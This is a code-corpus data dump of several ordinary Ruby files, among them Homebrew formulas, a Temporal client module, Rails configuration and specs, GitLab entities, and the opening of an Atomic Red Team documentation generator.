hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
61f3184547104d7dc33630b101c99e254ba85e7d | 565 | cask 'grids' do
version '5.4'
sha256 'c4359aa61073c9e0f412b522ce030d631741365e8b96e195760067fdc43489bd'
url "https://gridsapp.net/bin/Grids_#{version}.zip"
appcast 'https://gridsapp.net/appcast.json'
name 'Grids'
homepage 'https://gridsapp.net/'
auto_updates true
depends_on macos: '>= :sierra'
app 'Grids.app'
uninstall quit: 'com.thinktimecreations.Grids'
zap trash: [
'~/Library/Application Support/ThinkTimeCreations/Grids',
'~/Library/Preferences/com.thinktimecreations.Grids.plist',
]
end
| 25.681818 | 75 | 0.690265 |
28d7a00297876d32adb23e315696b54d9f4c14d7 | 2,122 | module Fog
module AWS
class EFS
class Real
# Create a new, empty file system
# http://docs.aws.amazon.com/efs/latest/ug/API_CreateFileSystem.html
# ==== Parameters
# * CreationToken <~String> - String of up to 64 ASCII characters. Amazon EFS uses this to ensure idempotent creation.
# * PerformanceMode <~String> - (Optional) The PerformanceMode of the file system. We recommend generalPurpose performance mode for most file systems. File systems using the maxIO performance mode can scale to higher levels of aggregate throughput and operations per second with a tradeoff of slightly higher latencies for most file operations. This can't be changed after the file system has been created.
# ==== Returns
# * response<~Excon::Response>
# * body<~Hash>
def create_file_system(creation_token, options={})
request({
:path => "file-systems",
:method => 'POST',
:expects => 201,
'CreationToken' => creation_token,
'PerformanceMode' => options[:peformance_mode] || 'generalPurpose'
})
end
end
class Mock
def create_file_system(creation_token, options={})
response = Excon::Response.new
id = "fs-#{Fog::Mock.random_letters(8)}"
file_system = {
"OwnerId" => Fog::AWS::Mock.owner_id,
"CreationToken" => creation_token,
"PerformanceMode" => options[:performance_mode] || "generalPurpose",
"FileSystemId" => id,
"CreationTime" => Time.now.to_i.to_f,
"LifeCycleState" => "creating",
"NumberOfMountTargets" => 0,
"SizeInBytes" => {
"Value" => 1024,
"Timestamp" => Time.now.to_i.to_f
}
}
self.data[:file_systems][id] = file_system
response.body = file_system
response.status = 201
response
end
end
end
end
end
| 40.807692 | 414 | 0.561734 |
1d8c7050911d283c037c09da1dd7ffb4dbbfed64 | 1,543 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::CostManagement::Mgmt::V2018_05_31
module Models
#
# The group by expression to be used in the report.
#
class ReportConfigGrouping
include MsRestAzure
# @return [ReportConfigColumnType] Has type of the column to group.
# Possible values include: 'Tag', 'Dimension'
attr_accessor :column_type
# @return [String] The name of the column to group.
attr_accessor :name
#
# Mapper for ReportConfigGrouping class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ReportConfigGrouping',
type: {
name: 'Composite',
class_name: 'ReportConfigGrouping',
model_properties: {
column_type: {
client_side_validation: true,
required: true,
serialized_name: 'columnType',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: true,
serialized_name: 'name',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 26.603448 | 73 | 0.534673 |
abeb00fb43060763abeb2912fe4be1db9471b5c9 | 5,733 | require 'spec_helper'
describe Fuzzily::Searchable do
# Prepare ourselves a Trigram repository
before do
silence_warnings do
Trigram = Class.new(ActiveRecord::Base)
end
Trigram.class_eval { include Fuzzily::Model }
end
before(:each) { prepare_trigrams_table }
before(:each) { prepare_owners_table }
subject do
silence_warnings do
Stuff = Class.new(ActiveRecord::Base)
end
def Stuff.name ; 'Stuff' ; end
def Stuff.flag ; false ; end
Stuff
end
describe '.fuzzily_searchable' do
it 'is available to all of ActiveRecord' do
subject.should respond_to(:fuzzily_searchable)
end
it 'adds a find_by_fuzzy_<field> method' do
subject.fuzzily_searchable :name
subject.should respond_to(:find_by_fuzzy_name)
end
it 'is idempotent' do
subject.fuzzily_searchable :name
subject.fuzzily_searchable :name
subject.should respond_to(:find_by_fuzzy_name)
end
it 'creates the trigrams_for_<field> association' do
subject.fuzzily_searchable :name
subject.new.should respond_to(:trigrams_for_name)
end
end
describe '(callbacks)' do
before { subject.fuzzily_searchable :name }
it 'generates trigram records on creation' do
subject.create!(:name => 'Paris')
subject.last.trigrams_for_name.should_not be_empty
end
it 'generates the correct trigrams' do
record = subject.create!(:name => 'FOO')
Trigram.first.trigram.should == '**f'
Trigram.first.owner_id.should == record.id
Trigram.first.owner_type.should == 'Stuff'
end
it 'updates all trigram records on save' do
subject.create!(:name => 'Paris')
subject.first.update_attribute :name, 'Rome'
Trigram.all.map(&:trigram).should =~ %w(**r *ro rom ome me*)
end
it 'deletes all trigrams on destroy' do
subject.create!(:name => 'Paris').destroy
Trigram.all.should be_empty
end
end
describe '#update_fuzzy_<field>!' do
before do
subject.fuzzily_searchable :name
end
it 're-creates trigrams' do
subject.create!(:name => 'Paris')
old_ids = Trigram.all.map(&:id)
subject.last.update_fuzzy_name!
(old_ids & Trigram.all.map(&:id)).should be_empty
end
it 'ignores nil values' do
subject.create!(:name => nil)
subject.last.update_fuzzy_name!
Trigram.all.should be_empty
end
if ActiveRecord::VERSION::MAJOR <= 3
let(:fields) {[ :score, :fuzzy_field, :trigram ]}
before { Trigram.attr_protected fields }
it 'tolerates mass assignment security' do
subject.create!(:name => 'Paris')
subject.last.update_fuzzy_name!
end
end
end
describe '.bulk_update_fuzzy_<field>' do
before { subject.fuzzily_searchable :name }
it 'creates all trigrams' do
subject.create!(:name => 'Paris')
Trigram.delete_all
subject.bulk_update_fuzzy_name
Trigram.all.should_not be_empty
end
it 'ignores nil values' do
subject.create!(:name => nil)
Trigram.delete_all
subject.bulk_update_fuzzy_name
Trigram.all.should be_empty
end
end
context '(integrationg test)' do
describe '#find_by_fuzzy_<field>' do
it 'returns records' do
subject.fuzzily_searchable :name
@paris = subject.create!(:name => 'Paris')
@palma = subject.create!(:name => 'Palma de Majorca')
@palmyre = subject.create!(:name => 'La Palmyre')
subject.find_by_fuzzy_name('Piris').should_not be_empty
subject.find_by_fuzzy_name('Piris').should =~ [@paris, @palma]
subject.find_by_fuzzy_name('Paradise').should =~ [@paris, @palma, @palmyre]
end
it 'favours exact matches' do
subject.fuzzily_searchable :name
@new_york = subject.create!(:name => 'New York')
@yorkshire = subject.create!(:name => 'Yorkshire')
@york = subject.create!(:name => 'York')
@yorkisthan = subject.create!(:name => 'Yorkisthan')
subject.find_by_fuzzy_name('York').should == [@york, @new_york, @yorkshire, @yorkisthan]
subject.find_by_fuzzy_name('Yorkshire').should == [@yorkshire, @york, @yorkisthan, @new_york]
end
it 'does not favour short words' do
subject.fuzzily_searchable :name
@lo = subject.create!(:name => 'Lo') # **l *lo lo*
@london = subject.create!(:name => 'London') # **l *lo lon ond ndo don on*
# **l *lo lon
subject.find_by_fuzzy_name('Lon').should == [@london, @lo]
end
it 'honours limit option' do
subject.fuzzily_searchable :name
3.times { subject.create!(:name => 'Paris') }
subject.find_by_fuzzy_name('Paris', :limit => 2).length.should == 2
end
it 'honours offset option' do
subject.fuzzily_searchable :name
3.times { subject.create!(:name => 'Paris') }
subject.find_by_fuzzy_name('Paris', :offset => 2).length.should == 1
end
it 'doesnt die on scopes' do
subject.fuzzily_searchable :name
@new_york = subject.create!(:name => 'New York', :flag => true)
@yorkshire = subject.create!(:name => 'Yorkshire', :flag => false)
expect {
subject.where(:flag => true).find_by_fuzzy_name('York')
}.to_not raise_error
end
it 'doesnt return nils' do
subject.fuzzily_searchable :name
@new_yokr = subject.create!(:name => 'New York', :flag => true)
results = subject.where(:flag => false).find_by_fuzzy_name('York')
results.any?{ |r| r == nil }.should be_false
end
end
end
end
| 30.989189 | 101 | 0.631258 |
918860b5c12a2edb112227448428efd66cef283a | 5,295 | # Protoc wants all of its generated files on the LOAD_PATH
$LOAD_PATH << File.expand_path('./gen', __dir__)
require 'securerandom'
require 'temporal/configuration'
require 'temporal/execution_options'
require 'temporal/client'
require 'temporal/activity'
require 'temporal/activity/async_token'
require 'temporal/workflow'
require 'temporal/workflow/history'
require 'temporal/workflow/execution_info'
require 'temporal/metrics'
module Temporal
class << self
def start_workflow(workflow, *input, **args)
options = args.delete(:options) || {}
input << args unless args.empty?
execution_options = ExecutionOptions.new(workflow, options)
workflow_id = options[:workflow_id] || SecureRandom.uuid
response = client.start_workflow_execution(
namespace: execution_options.namespace,
workflow_id: workflow_id,
workflow_name: execution_options.name,
task_queue: execution_options.task_queue,
input: input,
execution_timeout: execution_options.timeouts[:execution],
task_timeout: execution_options.timeouts[:task],
workflow_id_reuse_policy: options[:workflow_id_reuse_policy],
headers: execution_options.headers
)
response.run_id
end
def schedule_workflow(workflow, cron_schedule, *input, **args)
options = args.delete(:options) || {}
input << args unless args.empty?
execution_options = ExecutionOptions.new(workflow, options)
workflow_id = options[:workflow_id] || SecureRandom.uuid
response = client.start_workflow_execution(
namespace: execution_options.namespace,
workflow_id: workflow_id,
workflow_name: execution_options.name,
task_queue: execution_options.task_queue,
input: input,
execution_timeout: execution_options.timeouts[:execution],
task_timeout: execution_options.timeouts[:task],
workflow_id_reuse_policy: options[:workflow_id_reuse_policy],
headers: execution_options.headers,
cron_schedule: cron_schedule
)
response.run_id
end
def register_namespace(name, description = nil)
client.register_namespace(name: name, description: description)
end
def signal_workflow(workflow, signal, workflow_id, run_id, input = nil)
execution_options = ExecutionOptions.new(workflow)
client.signal_workflow_execution(
namespace: execution_options.namespace, # TODO: allow passing namespace instead
workflow_id: workflow_id,
run_id: run_id,
signal: signal,
input: input
)
end
def reset_workflow(namespace, workflow_id, run_id, workflow_task_id: nil, reason: 'manual reset')
workflow_task_id ||= get_last_completed_workflow_task_id(namespace, workflow_id, run_id)
raise Error, 'Could not find a completed workflow task event' unless workflow_task_id
response = client.reset_workflow_execution(
namespace: namespace,
workflow_id: workflow_id,
run_id: run_id,
reason: reason,
workflow_task_event_id: workflow_task_id
)
response.run_id
end
def terminate_workflow(workflow_id, namespace: nil, run_id: nil, reason: nil, details: nil)
namespace ||= Temporal.configuration.namespace
client.terminate_workflow_execution(
namespace: namespace,
workflow_id: workflow_id,
run_id: run_id,
reason: reason,
details: details
)
end
def fetch_workflow_execution_info(namespace, workflow_id, run_id)
response = client.describe_workflow_execution(
namespace: namespace,
workflow_id: workflow_id,
run_id: run_id
)
Workflow::ExecutionInfo.generate_from(response.workflow_execution_info)
end
def complete_activity(async_token, result = nil)
details = Activity::AsyncToken.decode(async_token)
client.respond_activity_task_completed_by_id(
namespace: details.namespace,
activity_id: details.activity_id,
workflow_id: details.workflow_id,
run_id: details.run_id,
result: result
)
end
def fail_activity(async_token, exception)
details = Activity::AsyncToken.decode(async_token)
client.respond_activity_task_failed_by_id(
namespace: details.namespace,
activity_id: details.activity_id,
workflow_id: details.workflow_id,
run_id: details.run_id,
exception: exception
)
end
def configure(&block)
yield configuration
end
def configuration
@configuration ||= Configuration.new
end
def logger
configuration.logger
end
def metrics
@metrics ||= Metrics.new(configuration.metrics_adapter)
end
private
def client
@client ||= Temporal::Client.generate
end
def get_last_completed_workflow_task_id(namespace, workflow_id, run_id)
history_response = client.get_workflow_execution_history(
namespace: namespace,
workflow_id: workflow_id,
run_id: run_id
)
history = Workflow::History.new(history_response.history.events)
workflow_task_event = history.get_last_completed_workflow_task
workflow_task_event&.id
end
end
end
| 30.606936 | 101 | 0.70085 |
f833dff97902ac333487dccb92a79bb8a7656e5b | 319 | class CreateWebHooks < ActiveRecord::Migration
def self.up
create_table :web_hooks do |table|
table.string :gem_name
table.integer :user_id
table.string :url
table.integer :failure_count, default: 0
table.timestamps
end
end
def self.down
drop_table :web_hooks
end
end
| 19.9375 | 46 | 0.68652 |
f7636312403d8bb3b2731969e76e0300d63a8ac8 | 5,041 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress CSS using a preprocessor.
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "App_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
config.serve_static_assets = false
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
| 44.219298 | 114 | 0.762349 |
26a794334747493a7c045efbc992bb5ba399e32f | 270 | module ApplicationHelper
# $user_id is for testing
def logged_in?
return session[:user_id].present? || $user_id.present?
end
def current_user
if logged_in?
return @current_user ||= User.find(session[:user_id] || $user_id)
else
return nil
end
end
end
| 18 | 68 | 0.714815 |
33bcb38525db57a09ed843bffce50b456315b54f | 2,816 | require 'coveralls'
Coveralls.wear!('rails')
ENV["RAILS_ENV"] ||= 'test'
require File.expand_path("../../config/environment", __FILE__)
require 'rspec/rails'
require 'rspec/autorun'
require 'sidekiq/testing'
include ActionDispatch::TestProcess
# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[Rails.root.join("spec/support/**/*.rb")].each { |f| require f }
# Checks for pending migrations before tests are run.
# If you are not using ActiveRecord, you can remove this line.
ActiveRecord::Migration.check_pending! if defined?(ActiveRecord::Migration)
RSpec.configure do |config|
# Avoid warnings about locale when running specs
I18n.enforce_available_locales = false
config.mock_with :mocha
config.include FactoryGirl::Syntax::Methods
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# If true, the base class of anonymous controllers will be inferred
# automatically. This will be the default behavior in future versions of
# rspec-rails.
config.infer_base_class_for_anonymous_controllers = false
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = 'random'
# In RSpec 3, symbols passed as metadata arguments to configuration options
# will be treated as metadata keys with a value of `true`. To get this
# behavior now (and prevent a warning), we can set this configuration option.
config.treat_symbols_as_metadata_keys_with_true_values = true
config.before(:each) do
Phantomjs.stubs(:run).yields '{"title": "A title"}' # Don't run PhantomJS
Sidekiq::Testing.inline! # Run async worker jobs synchronous
end
# Tag "uses_after_commit" helps when after_commit hook is expected
# to fire in a spec. It would never fire because of having enabled
# use_transactional_fixtures. It waits for transaction to end. The
# workaround disables transaction-wrapping for the tagged spec and
# instead uses a DatabaseCleaner strategy to wipe the tables here.
config.around(:each, :uses_after_commit) do |example|
_orig_use_transactional_fixtures = use_transactional_fixtures
self.use_transactional_fixtures = false
DatabaseCleaner.clean_with(:truncation)
example.call
DatabaseCleaner.clean_with(:truncation)
self.use_transactional_fixtures = _orig_use_transactional_fixtures
end
end
| 39.661972 | 79 | 0.764205 |
edc41dbd2c5db7a0470501579a21f9d54b5b792c | 436 | require 'spec_helper'
module JayaMegaLotto
describe Configuration do
let(:config) { Configuration.new }
it "default value is 6" do
expect(config.drawing_count).to eq(6)
# Configuration.new.drawing_count = 6
end
end
describe "#drawing_count=" do
let(:config) { Configuration.new }
it "can set value" do
config.drawing_count = 7
expect(config.drawing_count).to eq(7)
end
end
end
| 20.761905 | 43 | 0.669725 |
01602835043b9e588be73eb6bd709808d452930f | 2,077 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2018 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require_relative '../filters'
module Components
module WorkPackages
module TableConfiguration
class Filters < ::Components::WorkPackages::Filters
attr_reader :modal
def initialize
@modal = ::Components::WorkPackages::TableConfigurationModal.new
end
def open
modal.open_and_switch_to 'Filters'
expect_open
end
def save
modal.save
end
def expect_filter_count(count)
within(modal.selector) do
expect(page).to have_selector('.advanced-filters--filter', count: count)
end
end
def expect_open
modal.expect_open
expect(page).to have_selector('.tab-show.selected', text: 'Filters')
end
def expect_closed
modal.expect_closed
end
end
end
end
end
| 30.544118 | 91 | 0.692345 |
e93f2cb64de4200e845bc74a1c248e78f9d112f9 | 717 | # frozen_string_literal: true
require 'spec_helper'
require Rails.root.join('db', 'post_migrate', '20200615111857_unconfirm_wrongfully_verified_emails.rb')
RSpec.describe UnconfirmWrongfullyVerifiedEmails do
before do
user = table(:users).create!(name: 'user1', email: '[email protected]', projects_limit: 1)
table(:emails).create!(email: '[email protected]', user_id: user.id)
end
it 'enqueues WrongullyConfirmedEmailUnconfirmer job' do
Sidekiq::Testing.fake! do
migrate!
jobs = BackgroundMigrationWorker.jobs
expect(jobs.size).to eq(1)
expect(jobs.first["args"].first).to eq(Gitlab::BackgroundMigration::WrongfullyConfirmedEmailUnconfirmer.name.demodulize)
end
end
end
| 32.590909 | 126 | 0.747559 |
bfe40dfa2b4947358c2dd75ea836dc571a32e077 | 559 | require 'socky/server'
require 'redom'
require './chat/chat'
require './othello/othello'
class RedomApp < Rack::WebSocket::Application
def on_open(env)
Redom.on_open self
end
def on_message(env, msg)
Redom.on_message self, msg
end
def on_close(env)
Redom.on_close self
end
def send(msg)
send_data msg
end
end
Redom.start
map '/websocket' do
run RedomApp.new
end
map '/redom.js' do
run Proc.new {|env| [200, {"Content-Type" => "text/javascript"}, [Redom.runtime]]}
end
run Rack::Directory.new(File.expand_path('.'))
| 15.971429 | 84 | 0.686941 |
33eb33d314b221ed3fd70597cf8eb16536109121 | 3,439 | # frozen_string_literal: true
class DiffFileBaseEntity < Grape::Entity
include RequestAwareEntity
include BlobHelper
include DiffHelper
include TreeHelper
include ChecksCollaboration
include Gitlab::Utils::StrongMemoize
expose :content_sha
expose :submodule?, as: :submodule
expose :submodule_link do |diff_file, options|
memoized_submodule_links(diff_file, options).first
end
expose :submodule_tree_url do |diff_file|
memoized_submodule_links(diff_file, options).last
end
expose :edit_path, if: -> (_, options) { options[:merge_request] } do |diff_file|
merge_request = options[:merge_request]
next unless merge_request.merged? || merge_request.source_branch_exists?
target_project, target_branch = edit_project_branch_options(merge_request)
if Feature.enabled?(:web_ide_default)
ide_edit_path(target_project, target_branch, diff_file.new_path)
else
options = merge_request.persisted? && merge_request.source_branch_exists? && !merge_request.merged? ? { from_merge_request_iid: merge_request.iid } : {}
project_edit_blob_path(target_project, tree_join(target_branch, diff_file.new_path), options)
end
end
expose :old_path_html do |diff_file|
old_path, _ = mark_inline_diffs(diff_file.old_path, diff_file.new_path)
old_path
end
expose :new_path_html do |diff_file|
_, new_path = mark_inline_diffs(diff_file.old_path, diff_file.new_path)
new_path
end
expose :formatted_external_url, if: -> (_, options) { options[:environment] } do |diff_file|
options[:environment].formatted_external_url
end
expose :external_url, if: -> (_, options) { options[:environment] } do |diff_file|
options[:environment].external_url_for(diff_file.new_path, diff_file.content_sha)
end
expose :blob, using: BlobEntity
expose :can_modify_blob do |diff_file|
merge_request = options[:merge_request]
next unless diff_file.blob
if merge_request&.source_project && current_user
can_modify_blob?(diff_file.blob, merge_request.source_project, merge_request.source_branch_exists? ? merge_request.source_branch : merge_request.target_branch)
else
false
end
end
expose :file_identifier_hash
expose :file_hash
expose :file_path
expose :old_path
expose :new_path
expose :new_file?, as: :new_file
expose :renamed_file?, as: :renamed_file
expose :deleted_file?, as: :deleted_file
expose :diff_refs
expose :stored_externally?, as: :stored_externally
expose :external_storage
expose :mode_changed?, as: :mode_changed
expose :a_mode
expose :b_mode
expose :viewer, using: DiffViewerEntity
expose :alternate_viewer, using: DiffViewerEntity
expose :old_size do |diff_file|
diff_file.old_blob&.raw_size
end
expose :new_size do |diff_file|
diff_file.new_blob&.raw_size
end
private
def memoized_submodule_links(diff_file, options)
strong_memoize(:submodule_links) do
if diff_file.submodule?
options[:submodule_links].for(diff_file.blob, diff_file.content_sha)
else
[]
end
end
end
def current_user
request.current_user
end
def edit_project_branch_options(merge_request)
if merge_request.source_branch_exists? && !merge_request.merged?
[merge_request.source_project, merge_request.source_branch]
else
[merge_request.target_project, merge_request.target_branch]
end
end
end
| 27.95935 | 165 | 0.751963 |
39584300e5e505555c762079dffda585dd81112b | 1,226 | # frozen_string_literal: true
# Copyright 2015 Australian National Botanic Gardens
#
# This file is part of the NSL Editor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "test_helper"
# Single Name typeahead test.
class NameTAForUCSuggsShldNotInclNamesWOInstancesTest < ActiveSupport::TestCase
test "name for unpub cit sugg should include names without instances" do
suggestions = Name::AsTypeahead::ForUnpubCit
.new(term: "a name without instances")
.suggestions
assert(suggestions.is_a?(Array), "suggestions should be an array")
assert(!suggestions.empty?,
'suggestions for "a name without instances" should not be empty')
end
end
| 38.3125 | 79 | 0.729201 |
18a3961fb2ded2ecbd8d51d8f25c7d1682fa5ef5 | 4,377 | class Grafana < Formula
desc "Gorgeous metric visualizations and dashboards for timeseries databases"
homepage "https://grafana.com"
url "https://github.com/grafana/grafana/archive/v6.2.5.tar.gz"
sha256 "d91b9ef38bfa5a04ff6cd3502647f85057266c3fdef69cf56b67e323b6c0c284"
head "https://github.com/grafana/grafana.git"
bottle do
cellar :any_skip_relocation
sha256 "ea225d760a3f7b8bf647305cb8723b7d996d9549c7d85133488b398c0d9c6a15" => :mojave
sha256 "2fa4f819eb935821e155daf419b1f545452fe1a9ec0d7236f3a54d8247387a21" => :high_sierra
sha256 "9978e4d8af35d2e18d7059041e12fd2a09d3c4098e2c843415982c1e7178e9c6" => :sierra
end
depends_on "go" => :build
depends_on "node@10" => :build
depends_on "yarn" => :build
def install
ENV["GOPATH"] = buildpath
grafana_path = buildpath/"src/github.com/grafana/grafana"
grafana_path.install buildpath.children
cd grafana_path do
system "go", "run", "build.go", "build"
system "yarn", "install", "--ignore-engines"
system "node_modules/grunt-cli/bin/grunt", "build"
bin.install "bin/darwin-amd64/grafana-cli"
bin.install "bin/darwin-amd64/grafana-server"
(etc/"grafana").mkpath
cp("conf/sample.ini", "conf/grafana.ini.example")
etc.install "conf/sample.ini" => "grafana/grafana.ini"
etc.install "conf/grafana.ini.example" => "grafana/grafana.ini.example"
pkgshare.install "conf", "public", "tools", "vendor"
prefix.install_metafiles
end
end
def post_install
(var/"log/grafana").mkpath
(var/"lib/grafana/plugins").mkpath
end
plist_options :manual => "grafana-server --config=#{HOMEBREW_PREFIX}/etc/grafana/grafana.ini --homepath #{HOMEBREW_PREFIX}/share/grafana --packaging=brew cfg:default.paths.logs=#{HOMEBREW_PREFIX}/var/log/grafana cfg:default.paths.data=#{HOMEBREW_PREFIX}/var/lib/grafana cfg:default.paths.plugins=#{HOMEBREW_PREFIX}/var/lib/grafana/plugins"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key>
<false/>
</dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/grafana-server</string>
<string>--config</string>
<string>#{etc}/grafana/grafana.ini</string>
<string>--homepath</string>
<string>#{opt_pkgshare}</string>
<string>--packaging=brew</string>
<string>cfg:default.paths.logs=#{var}/log/grafana</string>
<string>cfg:default.paths.data=#{var}/lib/grafana</string>
<string>cfg:default.paths.plugins=#{var}/lib/grafana/plugins</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}/lib/grafana</string>
<key>StandardErrorPath</key>
<string>#{var}/log/grafana/grafana-stderr.log</string>
<key>StandardOutPath</key>
<string>#{var}/log/grafana/grafana-stdout.log</string>
<key>SoftResourceLimits</key>
<dict>
<key>NumberOfFiles</key>
<integer>10240</integer>
</dict>
</dict>
</plist>
EOS
end
test do
require "pty"
require "timeout"
# first test
system bin/"grafana-server", "-v"
# avoid stepping on anything that may be present in this directory
tdir = File.join(Dir.pwd, "grafana-test")
Dir.mkdir(tdir)
logdir = File.join(tdir, "log")
datadir = File.join(tdir, "data")
plugdir = File.join(tdir, "plugins")
[logdir, datadir, plugdir].each do |d|
Dir.mkdir(d)
end
Dir.chdir(pkgshare)
res = PTY.spawn(bin/"grafana-server",
"cfg:default.paths.logs=#{logdir}",
"cfg:default.paths.data=#{datadir}",
"cfg:default.paths.plugins=#{plugdir}",
"cfg:default.server.http_port=50100")
r = res[0]
w = res[1]
pid = res[2]
listening = Timeout.timeout(5) do
li = false
r.each do |l|
if l =~ /Initializing HTTPServer/
li = true
break
end
end
li
end
Process.kill("TERM", pid)
w.close
r.close
listening
end
end
| 32.422222 | 341 | 0.639708 |
5d8dfb0c7dc5756264755a44acf504481d1796e0 | 6,194 | #! /usr/bin/env ruby
$LOAD_PATH << "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team" unless $LOAD_PATH.include? "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team"
require 'erb'
require 'fileutils'
require 'atomic_red_team'
class AtomicRedTeamDocs
ATTACK_API = Attack.new
ATOMIC_RED_TEAM = AtomicRedTeam.new
ATOMIC_RED_TEAM_DIR = "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team"
#
# Generates all the documentation used by Atomic Red Team
#
def generate_all_the_docs!
oks = []
fails = []
ATOMIC_RED_TEAM.atomic_tests.each do |atomic_yaml|
begin
print "Generating docs for #{atomic_yaml['atomic_yaml_path']}"
generate_technique_docs! atomic_yaml, atomic_yaml['atomic_yaml_path'].gsub(/.yaml/, '.md')
# generate_technique_execution_docs! atomic_yaml, "#{File.dirname(File.dirname(__FILE__))}/atomic-red-team-execution/#{atomic_yaml['attack_technique'].downcase}.html"
oks << atomic_yaml['atomic_yaml_path']
